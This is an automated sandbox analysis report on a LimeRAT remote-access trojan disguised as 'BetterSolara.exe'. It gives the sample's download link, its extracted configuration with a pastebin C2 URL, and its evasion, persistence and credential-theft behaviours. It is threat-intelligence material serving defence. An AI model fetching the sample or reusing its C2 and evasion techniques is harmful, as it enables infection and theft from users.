limerat | hxxps://cdn[.]discordapp[.]com/attachments/1245482251467362385/1245491763477610506/BetterSolara[.]exe?ex=6658f218&is=6657a098&hm=6d4a1d7d00451c014a500cb11aa96a187ef87e27e44a2d7e34eb3e57704912ab&

Analysis

max time kernel
149s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20240508-en
resource tags

arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
submitted
29-05-2024 21:40

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://cdn.discordapp.com/attachments/1245482251467362385/1245491763477610506/BetterSolara.exe?ex=6658f218&is=6657a098&hm=6d4a1d7d00451c014a500cb11aa96a187ef87e27e44a2d7e34eb3e57704912ab&

Score

10^/10

limerat evasion execution persistence rat spyware stealer themida trojan

Malware Config

Extracted

Family

limerat

Attributes

aes_key
0790308
antivm
true
c2_url
https://pastebin.com/raw/J0uqtmU4
delay
3
download_payload
false
install
true
install_name
Wservices.exe
main_folder
AppData
pin_spread
false
sub_folder
\
usb_spread
false

Extracted

Family

limerat

Attributes

antivm
false
c2_url
https://pastebin.com/raw/J0uqtmU4
download_payload
false
install
false
pin_spread
false
usb_spread
false

Signatures

LimeRAT
Simple yet powerful RAT for Windows machines written in .NET.
rat limerat
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497

Processes:

cd57e4c171d6e8f5ea8b8f824a6a7316.exe

description ioc process

Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ cd57e4c171d6e8f5ea8b8f824a6a7316.exe
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exe

pid process

2016 powershell.exe
5552 powershell.exe
Downloads MZ/PE file

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	cd57e4c171d6e8f5ea8b8f824a6a7316.exe

pid	process
2016	powershell.exe
5552	powershell.exe

Drops file in Drivers directory 3 IoCs

Processes:

attrib.execd57e4c271d6e8f5ea8b8f824a6a7316.exeattrib.exe

description	ioc	process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	cd57e4c271d6e8f5ea8b8f824a6a7316.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

cd57e4c171d6e8f5ea8b8f824a6a7316.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	cd57e4c171d6e8f5ea8b8f824a6a7316.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	cd57e4c171d6e8f5ea8b8f824a6a7316.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

BetterSolara.execd57e4c172d6e8f5ea8b8f824a6a7316.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\Control Panel\International\Geo\Nation	BetterSolara.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\Control Panel\International\Geo\Nation	cd57e4c172d6e8f5ea8b8f824a6a7316.exe

Executes dropped EXE 5 IoCs

Processes:

BetterSolara.execd57e4c171d6e8f5ea8b8f824a6a7316.execd57e4c172d6e8f5ea8b8f824a6a7316.execd57e4c271d6e8f5ea8b8f824a6a7316.exeWservices.exe

pid	process
5688	BetterSolara.exe
5984	cd57e4c171d6e8f5ea8b8f824a6a7316.exe
6012	cd57e4c172d6e8f5ea8b8f824a6a7316.exe
6060	cd57e4c271d6e8f5ea8b8f824a6a7316.exe
5608	Wservices.exe

Loads dropped DLL 5 IoCs

Processes:

cd57e4c171d6e8f5ea8b8f824a6a7316.exe

pid	process
5984	cd57e4c171d6e8f5ea8b8f824a6a7316.exe
5984	cd57e4c171d6e8f5ea8b8f824a6a7316.exe
5984	cd57e4c171d6e8f5ea8b8f824a6a7316.exe
5984	cd57e4c171d6e8f5ea8b8f824a6a7316.exe
5984	cd57e4c171d6e8f5ea8b8f824a6a7316.exe

Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Themida packer 8 IoCs

Detects Themida, an advanced Windows software protection system.

themida

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\RarSFX0\cd57e4c171d6e8f5ea8b8f824a6a7316.dll	themida
behavioral1/memory/5984-1860-0x0000000180000000-0x0000000180C32000-memory.dmp	themida
behavioral1/memory/5984-1901-0x0000000180000000-0x0000000180C32000-memory.dmp	themida
behavioral1/memory/5984-1905-0x0000000180000000-0x0000000180C32000-memory.dmp	themida
behavioral1/memory/5984-1906-0x0000000180000000-0x0000000180C32000-memory.dmp	themida
behavioral1/memory/5984-1907-0x0000000180000000-0x0000000180C32000-memory.dmp	themida
behavioral1/memory/5984-1931-0x0000000180000000-0x0000000180C32000-memory.dmp	themida
behavioral1/memory/5984-1955-0x0000000180000000-0x0000000180C32000-memory.dmp	themida

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

cd57e4c271d6e8f5ea8b8f824a6a7316.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Realtek HD Audio Universal Service = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Protect\\SecurityHealthSystray.exe"	cd57e4c271d6e8f5ea8b8f824a6a7316.exe

Checks whether UAC is enabled 1 TTPs 1 IoCs

evasion trojan

System Information Discovery

T1082

Processes:

cd57e4c171d6e8f5ea8b8f824a6a7316.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	cd57e4c171d6e8f5ea8b8f824a6a7316.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 6 IoCs

Web Service
T1102

Processes:

flow ioc

77 pastebin.com
82 raw.githubusercontent.com
83 raw.githubusercontent.com
52 discord.com
54 discord.com
76 pastebin.com
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

45 api.ipify.org
46 api.ipify.org
48 ip-api.com

flow	ioc
77	pastebin.com
82	raw.githubusercontent.com
83	raw.githubusercontent.com
52	discord.com
54	discord.com
76	pastebin.com

flow	ioc
45	api.ipify.org
46	api.ipify.org
48	ip-api.com

Maps connected drives based on registry 3 TTPs 2 IoCs

Disk information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

cd57e4c271d6e8f5ea8b8f824a6a7316.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum	cd57e4c271d6e8f5ea8b8f824a6a7316.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0	cd57e4c271d6e8f5ea8b8f824a6a7316.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

Processes:

cd57e4c171d6e8f5ea8b8f824a6a7316.exe

pid process

5984 cd57e4c171d6e8f5ea8b8f824a6a7316.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task/Job
T1053

Processes:

schtasks.exe

pid process

5900 schtasks.exe
Detects videocard installed 1 TTPs 2 IoCs
Uses WMIC.exe to determine videocard installed.

System Information Discovery
T1082

Processes:

wmic.exewmic.exe

pid process

2624 wmic.exe
5928 wmic.exe

pid	process
5900	schtasks.exe

pid	process
2624	wmic.exe
5928	wmic.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

msedge.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

GoLang User-Agent 1 IoCs
Uses default user-agent string defined by GoLang HTTP packages.

Processes:

description flow ioc

HTTP User-Agent header 49 Go-http-client/1.1

description	flow	ioc
HTTP User-Agent header	49	Go-http-client/1.1

Modifies system certificate store 2 TTPs 9 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

Processes:

cd57e4c271d6e8f5ea8b8f824a6a7316.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8	cd57e4c271d6e8f5ea8b8f824a6a7316.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474	cd57e4c271d6e8f5ea8b8f824a6a7316.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 040000000100000010000000acb694a59c17e0d791529bb19706a6e40f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f53000000010000007f000000307d3020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c0301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c009000000010000003e000000303c06082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030906082b0601050507030106082b060105050703080b0000000100000030000000440069006700690043006500720074002000420061006c00740069006d006f0072006500200052006f006f007400000062000000010000002000000016af57a9f676b0ab126095aa5ebadef22ab31119d644ac95cd4b93dbf3f26aeb140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df01d0000000100000010000000918ad43a9475f78bb5243de886d8103c7f000000010000000c000000300a06082b060105050703097e000000010000000800000000c001b39667d601030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae47419000000010000001000000068cb42b035ea773e52ef50ecf50ec52920000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9	cd57e4c271d6e8f5ea8b8f824a6a7316.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C	cd57e4c271d6e8f5ea8b8f824a6a7316.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C\Blob = 0400000001000000100000003e455215095192e1b75d379fb187298a0f00000001000000140000005a6d07b6371d966a2fb6ba92828ce5512a49513d090000000100000068000000306606082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050508020206082b0601050507030606082b0601050507030706082b0601050507030906082b0601050507030106082b06010505070308530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520031000000620000000100000020000000ebd41040e4bb3ec742c9e381d31ef2a41a48b6685c96e7cef3c1df6cd4331c99140000000100000014000000607b661a450d97ca89502f7d04cd34a8fffcfd4b1d00000001000000100000006ee7f3b060d10e90a31ba3471b9992367f000000010000000c000000300a06082b060105050703097a000000010000000c000000300a06082b060105050703097e00000001000000080000000000042beb77d501030000000100000014000000b1bc968bd4f49d622aa89a81f2150152a41d829c190000000100000010000000a823b4a20180beb460cab955c24d7e21200000000100000079030000308203753082025da003020102020b040000000001154b5ac394300d06092a864886f70d01010505003057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f74204341301e170d3938303930313132303030305a170d3238303132383132303030305a3057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100da0ee6998dcea3e34f8a7efbf18b83256bea481ff12ab0b9951104bdf063d1e26766cf1cddcf1b482bee8d898e9aaf298065abe9c72d12cbab1c4c7007a13d0a30cd158d4ff8ddd48c50151cef50eec42ef7fce952f2917de06dd535308e5e4373f241e9d56ae3b2893a5639386f063c88695b2a4dc5a754b86c89cc9bf93ccae5fd89f5123c927896d6dc746e934461d18dc746b2750e86e8198ad56d6cd5781695a2e9c80a38ebf224134f73549313853a1bbc1e34b58b058cb9778bb1db1f2091ab09536e90ce7b3774b97047912251631679aeb1ae412608c8192bd146aa48d6642ad78334ff2c2ac16c19434a0785e7d37cf62168efeaf2529f7f9390cf0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e04160414607b661a450d97ca89502f7d04cd34a8fffcfd4b300d06092a864886f70d01010505000382010100d673e77c4f76d08dbfecbaa2be34c52832b57cfc6c9c2c2bbd099e53bf6b5eaa1148b6e508a3b3ca3d614dd34609b33ec3a0e363551bf2baefad39e143b938a3e62f8a263befa05056f9c60afd38cdc40b705194979804dfc35f94d515c914419cc45d7564150dff5530ec868fff0def2cb96346f6aafcdfbc69fd2e1248649ae095f0a6ef298f01b115b50c1da5fe692c6924781eb3a71c7162eecac897ac175d8ac2f847866e2ac4563195d06789852bf96ca65d469d0caa82e49951dd70b7db563d61e46ae15cd6f6fe3dde41cc07ae6352bf5353f42be9c7fdb6f7825f85d24118db81b3041cc51fa4806f1520c9de0c880a1dd66655e2fc48c9292669e0	cd57e4c271d6e8f5ea8b8f824a6a7316.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C\Blob = 5c000000010000000400000000080000190000000100000010000000a823b4a20180beb460cab955c24d7e21030000000100000014000000b1bc968bd4f49d622aa89a81f2150152a41d829c7e00000001000000080000000000042beb77d5017a000000010000000c000000300a06082b060105050703097f000000010000000c000000300a06082b060105050703091d00000001000000100000006ee7f3b060d10e90a31ba3471b999236140000000100000014000000607b661a450d97ca89502f7d04cd34a8fffcfd4b620000000100000020000000ebd41040e4bb3ec742c9e381d31ef2a41a48b6685c96e7cef3c1df6cd4331c990b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520031000000530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000068000000306606082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050508020206082b0601050507030606082b0601050507030706082b0601050507030906082b0601050507030106082b060105050703080f00000001000000140000005a6d07b6371d966a2fb6ba92828ce5512a49513d0400000001000000100000003e455215095192e1b75d379fb187298a200000000100000079030000308203753082025da003020102020b040000000001154b5ac394300d06092a864886f70d01010505003057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f74204341301e170d3938303930313132303030305a170d3238303132383132303030305a3057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100da0ee6998dcea3e34f8a7efbf18b83256bea481ff12ab0b9951104bdf063d1e26766cf1cddcf1b482bee8d898e9aaf298065abe9c72d12cbab1c4c7007a13d0a30cd158d4ff8ddd48c50151cef50eec42ef7fce952f2917de06dd535308e5e4373f241e9d56ae3b2893a5639386f063c88695b2a4dc5a754b86c89cc9bf93ccae5fd89f5123c927896d6dc746e934461d18dc746b2750e86e8198ad56d6cd5781695a2e9c80a38ebf224134f73549313853a1bbc1e34b58b058cb9778bb1db1f2091ab09536e90ce7b3774b97047912251631679aeb1ae412608c8192bd146aa48d6642ad78334ff2c2ac16c19434a0785e7d37cf62168efeaf2529f7f9390cf0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e04160414607b661a450d97ca89502f7d04cd34a8fffcfd4b300d06092a864886f70d01010505000382010100d673e77c4f76d08dbfecbaa2be34c52832b57cfc6c9c2c2bbd099e53bf6b5eaa1148b6e508a3b3ca3d614dd34609b33ec3a0e363551bf2baefad39e143b938a3e62f8a263befa05056f9c60afd38cdc40b705194979804dfc35f94d515c914419cc45d7564150dff5530ec868fff0def2cb96346f6aafcdfbc69fd2e1248649ae095f0a6ef298f01b115b50c1da5fe692c6924781eb3a71c7162eecac897ac175d8ac2f847866e2ac4563195d06789852bf96ca65d469d0caa82e49951dd70b7db563d61e46ae15cd6f6fe3dde41cc07ae6352bf5353f42be9c7fdb6f7825f85d24118db81b3041cc51fa4806f1520c9de0c880a1dd66655e2fc48c9292669e0	cd57e4c271d6e8f5ea8b8f824a6a7316.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827	cd57e4c271d6e8f5ea8b8f824a6a7316.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 5c0000000100000004000000001000001900000001000000100000002fe1f70bb05d7c92335bc5e05b984da60f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f63030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e814000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e20000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827	cd57e4c271d6e8f5ea8b8f824a6a7316.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 5c00000001000000040000000008000019000000010000001000000068cb42b035ea773e52ef50ecf50ec529030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae4747e000000010000000800000000c001b39667d6017f000000010000000c000000300a06082b060105050703091d0000000100000010000000918ad43a9475f78bb5243de886d8103c140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df062000000010000002000000016af57a9f676b0ab126095aa5ebadef22ab31119d644ac95cd4b93dbf3f26aeb0b0000000100000030000000440069006700690043006500720074002000420061006c00740069006d006f0072006500200052006f006f007400000009000000010000003e000000303c06082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030906082b0601050507030106082b0601050507030853000000010000007f000000307d3020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c0301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f040000000100000010000000acb694a59c17e0d791529bb19706a6e420000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af